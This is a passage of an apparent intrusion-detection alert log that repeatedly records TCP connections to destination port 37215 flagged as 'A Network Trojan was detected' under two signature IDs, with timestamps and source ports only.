                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.655988
                  SID:2829579
                  Source Port:54752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2829579
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800332
                  SID:2835222
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2829579
                  Source Port:33350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.148298
                  SID:2835222
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2829579
                  Source Port:55422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.504243
                  SID:2835222
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.851109
                  SID:2829579
                  Source Port:34624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.400468
                  SID:2835222
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2835222
                  Source Port:47326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:55530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766765
                  SID:2829579
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2835222
                  Source Port:56656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053673
                  SID:2835222
                  Source Port:59506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2829579
                  Source Port:58156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2835222
                  Source Port:35810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:60032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2829579
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489238
                  SID:2835222
                  Source Port:46164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938388
                  SID:2829579
                  Source Port:56788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939708
                  SID:2835222
                  Source Port:53056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.985380
                  SID:2835222
                  Source Port:48572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2829579
                  Source Port:42498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2835222
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245914
                  SID:2829579
                  Source Port:34264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.662577
                  SID:2835222
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116363
                  SID:2829579
                  Source Port:54242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009265
                  SID:2835222
                  Source Port:60466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939250
                  SID:2829579
                  Source Port:51856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093817
                  SID:2835222
                  Source Port:51428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2829579
                  Source Port:59070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2835222
                  Source Port:39098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2835222
                  Source Port:38922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2835222
                  Source Port:53890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2835222
                  Source Port:54924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368939
                  SID:2835222
                  Source Port:51804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.350674
                  SID:2829579
                  Source Port:39988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155412
                  SID:2829579
                  Source Port:54852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.551823
                  SID:2835222
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030544
                  SID:2829579
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488925
                  SID:2829579
                  Source Port:40240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2835222
                  Source Port:43406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.684476
                  SID:2835222
                  Source Port:48246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2829579
                  Source Port:40260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2835222
                  Source Port:34956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037412
                  SID:2829579
                  Source Port:37374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:49364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2829579
                  Source Port:32816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2835222
                  Source Port:54284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2829579
                  Source Port:55146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2835222
                  Source Port:56864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2829579
                  Source Port:37756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2835222
                  Source Port:37104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.833286
                  SID:2829579
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2835222
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2829579
                  Source Port:47944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2835222
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.564039
                  SID:2835222
                  Source Port:45054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.584694
                  SID:2829579
                  Source Port:33868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.839757
                  SID:2829579
                  Source Port:39370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050509
                  SID:2835222
                  Source Port:34736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2835222
                  Source Port:40884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2829579
                  Source Port:60762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609280
                  SID:2835222
                  Source Port:59428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2835222
                  Source Port:46548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454627
                  SID:2835222
                  Source Port:57566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322726
                  SID:2835222
                  Source Port:47434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.902387
                  SID:2829579
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.205832
                  SID:2835222
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.059719
                  SID:2829579
                  Source Port:50208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102101
                  SID:2829579
                  Source Port:45004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360026
                  SID:2835222
                  Source Port:47644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.026020
                  SID:2829579
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2829579
                  Source Port:41506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.450568
                  SID:2835222
                  Source Port:36492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.480155
                  SID:2829579
                  Source Port:53246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835565
                  SID:2829579
                  Source Port:55408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2829579
                  Source Port:35772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.372666
                  SID:2835222
                  Source Port:50586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362991
                  SID:2835222
                  Source Port:57846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.825720
                  SID:2835222
                  Source Port:52412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2829579
                  Source Port:45860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2829579
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.579730
                  SID:2829579
                  Source Port:54334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.839562
                  SID:2835222
                  Source Port:41220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2829579
                  Source Port:52940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:37804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2835222
                  Source Port:59516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603230
                  SID:2829579
                  Source Port:51610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2835222
                  Source Port:59886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2835222
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.463827
                  SID:2835222
                  Source Port:48090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2829579
                  Source Port:56764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596556
                  SID:2835222
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2835222
                  Source Port:44392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2829579
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2835222
                  Source Port:37666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.085115
                  SID:2835222
                  Source Port:56568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503396
                  SID:2835222
                  Source Port:35482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240891
                  SID:2835222
                  Source Port:56576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.182366
                  SID:2835222
                  Source Port:40072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381033
                  SID:2829579
                  Source Port:57836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553741
                  SID:2835222
                  Source Port:33094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2829579
                  Source Port:58026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2835222
                  Source Port:51758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.874379
                  SID:2835222
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486386
                  SID:2835222
                  Source Port:48152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2835222
                  Source Port:35850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.792244
                  SID:2835222
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2829579
                  Source Port:49924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:41010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071215
                  SID:2835222
                  Source Port:34132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2829579
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.879957
                  SID:2835222
                  Source Port:45156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2829579
                  Source Port:47290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998046
                  SID:2829579
                  Source Port:39150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.182396
                  SID:2829579
                  Source Port:50378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093206
                  SID:2835222
                  Source Port:46530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.870791
                  SID:2829579
                  Source Port:40374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2835222
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.876812
                  SID:2829579
                  Source Port:49474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192940
                  SID:2835222
                  Source Port:46016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2835222
                  Source Port:41692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776043
                  SID:2835222
                  Source Port:50796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.954167
                  SID:2829579
                  Source Port:42912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347149
                  SID:2835222
                  Source Port:51782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2829579
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2835222
                  Source Port:54122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.906366
                  SID:2829579
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054744
                  SID:2829579
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2829579
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2829579
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.771022
                  SID:2829579
                  Source Port:40230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190530
                  SID:2835222
                  Source Port:55648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.154911
                  SID:2829579
                  Source Port:33538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2835222
                  Source Port:49668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.341991
                  SID:2835222
                  Source Port:38786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771792
                  SID:2829579
                  Source Port:56814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559179
                  SID:2829579
                  Source Port:49806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.514336
                  SID:2835222
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2829579
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442077
                  SID:2835222
                  Source Port:38944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2835222
                  Source Port:52832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148385
                  SID:2835222
                  Source Port:43056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925119
                  SID:2835222
                  Source Port:45308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2835222
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.602276
                  SID:2829579
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2835222
                  Source Port:49132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483552
                  SID:2829579
                  Source Port:50684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2835222
                  Source Port:58976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137908
                  SID:2835222
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.831201
                  SID:2835222
                  Source Port:34140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.581833
                  SID:2829579
                  Source Port:49594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2835222
                  Source Port:53302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2829579
                  Source Port:47610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236926
                  SID:2829579
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.986778
                  SID:2829579
                  Source Port:47530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999668
                  SID:2835222
                  Source Port:56876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.562069
                  SID:2829579
                  Source Port:34402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.140373
                  SID:2829579
                  Source Port:38542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.882754
                  SID:2829579
                  Source Port:50384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2829579
                  Source Port:35864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2835222
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.455887
                  SID:2829579
                  Source Port:45982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.691821
                  SID:2829579
                  Source Port:38784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.413310
                  SID:2829579
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.920662
                  SID:2835222
                  Source Port:39174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503899
                  SID:2835222
                  Source Port:35104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2835222
                  Source Port:45254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569954
                  SID:2829579
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777309
                  SID:2835222
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948023
                  SID:2835222
                  Source Port:50360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2835222
                  Source Port:37172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168869
                  SID:2835222
                  Source Port:33712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049111
                  SID:2835222
                  Source Port:47772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.811617
                  SID:2835222
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.930336
                  SID:2835222
                  Source Port:36108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.661984
                  SID:2829579
                  Source Port:58078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.859922
                  SID:2829579
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.541811
                  SID:2829579
                  Source Port:42396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956577
                  SID:2829579
                  Source Port:47774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065824
                  SID:2829579
                  Source Port:42064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2835222
                  Source Port:58250
